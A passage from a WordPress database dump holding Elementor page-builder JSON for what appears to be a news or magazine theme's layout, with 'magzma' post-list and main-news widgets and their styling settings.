"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1193,436,'_elementor_version','0.4'),(1195,437,'_elementor_edit_mode','builder'),(1196,437,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pr